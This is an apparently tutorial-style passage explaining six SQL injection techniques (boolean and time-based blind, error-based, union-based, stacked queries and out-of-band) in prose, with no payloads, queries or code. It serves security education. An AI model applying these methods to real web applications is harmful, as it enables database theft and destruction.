SQL Injection is the most commonly used technique of intrusion to an web application where malicious SQL statements are inserted into the database server of an web/cloud application to execute certain operations such as extracting data from the database, deleting the entire database or making it inaccessible for the application. Over time a number of techniques have been evolved for SQL injection to disarm counter measures deployed by web application developers. Here we will learn about the most commonly utilized techniques.
Boolean Based Blind Injection
Boolean-based SQLi is an SQL Injection technique that injects an SQL query to the database to force the application to return a different HTTP response depending on the actual response from the database against the injected query is true or false.
Boolean based blind injection is done to determine if the database returns a true or false result in response to the injected query statement. Normally Boolean based blind attacks are done with an objective to determine a query pattern acceptable and executable by the database rather than extracting information/data from the database.
Time Based Blind Injection
Time Based Blind SQLi is another blind SQL injection technique developed with the same objective i.e. to infer the database response is either true or false. However in case of Time Based Blind SQLi an HTTP response comes out either with a time delay or immediately rather than two different HTTP response in case of Boolean Based Blid Injections.
Error Based Injection
Error based SQLi is one of the most dangerous and direct way of SQL injection as attackers are able to inject a perfectly defined query while having sufficient information In hand. In Error based SQL Injection attackers gather information about the database from the incorrectly handled error responses thrown out by the database server. For an experienced and intelligent attacker it is easy to gather cognizable information from incorrectly handled error messages as they would directly obtain crucial information like database map, table names, field names/types, validations etc which enables them inject a direct query to extract the entire database or delete it.
Union Query Based Injection
Union-based SQLi is an in-band SQL injection technique that utilizes the UNION SQL operator to combine two or more select statement in an injectable SQL query. Combine response of the Union query then obtained through a HTTP response. Union Query based injection technique is normally used where stacked queries option is not available (i.e. semicolon is not allowed to be entered through the input channel).
Stacked Queries Injection
Stacked Queries SQLis are those which utilize a group of different SQL queries separated by semicolon operator (which means end of an sql statement) in a single injection. Stacked queries provides a lots of control to the intruder as the capacity of injecting multiple separate SQL statements enables them to execute SELECT, UPDATE, DELETE statements together and also allows them to create and call store procedures.
Out of Band SQL Injection
Out-of-band SQL Injection is possible only when the targeted database server is enabled to send DNS and HTTP requests. Time based blind injection becomes an unreliable option to extract data when the database server provide resistance for the attacker to use the same channel repeatedly or the database server response to time based injection is unstable.
However the primary criteria for that option to be available is that the database server must be enabled to send DNS or HTTP requests to an external server which is not a default scenario unless a application specific requirement for the same exists.